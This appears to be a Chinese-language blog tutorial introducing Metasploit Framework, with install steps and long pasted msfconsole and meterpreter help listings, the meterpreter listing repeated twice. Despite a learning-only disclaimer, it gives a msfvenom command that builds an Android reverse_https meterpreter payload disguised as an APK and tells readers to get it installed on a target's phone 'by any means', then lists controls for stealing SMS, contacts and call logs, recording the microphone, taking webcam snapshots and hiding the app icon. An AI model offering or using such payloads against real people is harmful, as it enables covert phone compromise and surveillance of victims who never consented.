本文仅用于学习和技术探讨,不作为任何恶意行为能力传播,本质上,只是想让大家学习了解MSF。
Metasploit Framework (MSF)是目前所能接触到的软件渗透测试工具中最知名的工具,包括数千个工具和模块,可用于探索和利用漏洞、执行调查、测试和工具/有效负载创建等,对攻击者、防御者来说都是爱恨交加。
三个版本.
Metasploit Pro
Metasploit Community
Metasploit Framework
1、更新
apt-get update && apt-get upgrade
2. 安装所有依赖
apt install -y git ruby ruby-dev build-essential zlib1g zlib1g-dev libpq-dev libpcap-dev libsqlite3-dev
3. 克隆官方git库
git clone https://github.com/rapid7/metasploit-framework.git
4. 安装ruby的bundler包管理器
gem install bundler
5. 进目录并安装:
cd metasploit-framework && bundle install
6. go
./msfconsole
以上并不是所有的、可能的步骤和路径,版本很多,各自有各自的安装方式,但都可以通过msfconsole启动:
Metasploit Framework — msfconsole
1、帮助(快速了解工具的方法,适用于所有新上手的工具)
msf-potian > help
Core Commands
\=============
Command Description
------- -----------
? Help menu
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
debug Display information useful for debugging
exit Exit the console
features Display the list of not yet released features that can be opted in to
get Gets the value of a context-specific variable
getg Gets the value of a global variable
grep Grep the output of another command
help Help menu
history Show command history
load Load a framework plugin
quit Exit the console
repeat Repeat a list of commands
route Route traffic through a session
save Saves the active datastores
sessions Dump session listings and display information about sessions
set Sets a context-specific variable to a value
setg Sets a global variable to a value
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
tips Show a list of useful productivity tips
unload Unload a framework plugin
unset Unsets one or more context-specific variables
unsetg Unsets one or more global variables
version Show the framework and console library version numbers
Module Commands
\===============
Command Description
------- -----------
advanced Displays advanced options for one or more modules
back Move back from the current context
clearm Clear the module stack
favorite Add module(s) to the list of favorite modules
info Displays information about one or more modules
listm List the module stack
loadpath Searches for and loads modules from a path
options Displays global options or for one or more modules
popm Pops the latest module off the stack and makes it active
previous Sets the previously loaded module as the current module
pushm Pushes the active or list of modules onto the module stack
reload\_all Reloads all modules from all defined module paths
search Searches module names and descriptions
show Displays modules of a given type, or all modules
use Interact with a module by name or search term/index
Job Commands
\============
Command Description
------- -----------
handler Start a payload handler as job
jobs Displays and manages jobs
kill Kill a job
rename\_job Rename a job
Resource Script Commands
\========================
Command Description
------- -----------
makerc Save commands entered since start to a file
resource Run the commands stored in a file
Database Backend Commands
\=========================
Command Description
------- -----------
analyze Analyze database information about a specific address or address range
db\_connect Connect to an existing data service
db\_disconnect Disconnect from the current data service
db\_export Export a file containing the contents of the database
db\_import Import a scan result file (filetype will be auto-detected)
db\_nmap Executes nmap and records the output automatically
db\_rebuild\_cache Rebuilds the database-stored module cache (deprecated)
db\_remove Remove the saved data service entry
db\_save Save the current data service connection as the default to reconnect on startup
db\_status Show the current data service status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
Credentials Backend Commands
\============================
Command Description
------- -----------
creds List all credentials in the database
Developer Commands
\==================
Command Description
------- -----------
edit Edit the current module or a file with the preferred editor
irb Open an interactive Ruby shell in the current context
log Display framework.log paged to the end if possible
pry Open the Pry debugger on the current module or Framework
reload\_lib Reload Ruby library files from specified paths
time Time how long it takes to run a particular command
2、快速搜索
search <anything>
search android
选择想试用的模块:
use <#number>
use 19
查看支持的选项和命令:
show options
info
info -d
info -d
生成有效负载,以安卓手机为例子:
msfvenom –p android/meterpreter/reverse\_https LHOST=<Your\_IP> LPORT=<Your\_Port> R > evilcorp.apk
现在,只要我们吧有效载荷通过任何手段发送到目标并安装云顶,那么我们就可以通过如下命令享受成果:
exploit
Here we go:
从这里开始你的第一次hack之旅!
exploit finalized!
可以执行的命令列表:
Core Commands
\=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable\_unicode\_encoding Disables encoding of unicode strings
enable\_unicode\_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get\_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine\_id Get the MSF ID of the machine attached to the session
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
secure (Re)Negotiate TLV packet encryption on the session
sessions Quickly switch to another session
set\_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session
transport Manage the transport mechanisms
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
\============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
del Delete the specified file
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcat Read the contents of a local file to the screen
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
\===========================
Command Description
------- -----------
ifconfig Display interfaces
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
\=======================
Command Description
------- -----------
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getuid Get the user that the server is running as
localtime Displays the target system local date and time
pgrep Filter processes by name
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
\===============================
Command Description
------- -----------
screenshare Watch the remote user desktop in real time
screenshot Grab a screenshot of the interactive desktop
Stdapi: Webcam Commands
\=======================
Command Description
------- -----------
record\_mic Record audio from the default microphone for X seconds
webcam\_chat Start a video chat
webcam\_list List webcams
webcam\_snap Take a snapshot from the specified webcam
webcam\_stream Play a video stream from the specified webcam
Stdapi: Audio Output Commands
\=============================
Command Description
------- -----------
play play a waveform audio file (.wav) on the target system
Android Commands
\================
Command Description
------- -----------
activity\_start Start an Android activity from a Uri string
check\_root Check if device is rooted
dump\_calllog Get call log
dump\_contacts Get contacts list
dump\_sms Get sms messages
geolocate Get current lat-long using geolocation
hide\_app\_icon Hide the app icon from the launcher
interval\_collect Manage interval collection capabilities
send\_sms Sends SMS from target session
set\_audio\_mode Set Ringer Mode
sqlite\_query Query a SQLite database from storage
wakelock Enable/Disable Wakelock
wlan\_geolocate Get current lat-long using WLAN information
Application Controller Commands
\===============================
Command Description
------- -----------
app\_install Request to install apk file
app\_list List installed apps in the device
app\_run Start Main Activty for package name
app\_uninstall Request to uninstall application
meterpreter > help
Core Commands
\=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable\_unicode\_encoding Disables encoding of unicode strings
enable\_unicode\_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get\_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine\_id Get the MSF ID of the machine attached to the session
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
secure (Re)Negotiate TLV packet encryption on the session
sessions Quickly switch to another session
set\_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session
transport Manage the transport mechanisms
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
\============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
del Delete the specified file
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcat Read the contents of a local file to the screen
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
\===========================
Command Description
------- -----------
ifconfig Display interfaces
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
\=======================
Command Description
------- -----------
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getuid Get the user that the server is running as
localtime Displays the target system local date and time
pgrep Filter processes by name
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
\===============================
Command Description
------- -----------
screenshare Watch the remote user desktop in real time
screenshot Grab a screenshot of the interactive desktop
Stdapi: Webcam Commands
\=======================
Command Description
------- -----------
record\_mic Record audio from the default microphone for X seconds
webcam\_chat Start a video chat
webcam\_list List webcams
webcam\_snap Take a snapshot from the specified webcam
webcam\_stream Play a video stream from the specified webcam
Stdapi: Audio Output Commands
\=============================
Command Description
------- -----------
play play a waveform audio file (.wav) on the target system
Android Commands
\================
Command Description
------- -----------
activity\_start Start an Android activity from a Uri string
check\_root Check if device is rooted
dump\_calllog Get call log
dump\_contacts Get contacts list
dump\_sms Get sms messages
geolocate Get current lat-long using geolocation
hide\_app\_icon Hide the app icon from the launcher
interval\_collect Manage interval collection capabilities
send\_sms Sends SMS from target session
set\_audio\_mode Set Ringer Mode
sqlite\_query Query a SQLite database from storage
wakelock Enable/Disable Wakelock
wlan\_geolocate Get current lat-long using WLAN information
Application Controller Commands
\===============================
Command Description
------- -----------
app\_install Request to install apk file
app\_list List installed apps in the device
app\_run Start Main Activty for package name
app\_uninstall Request to uninstall application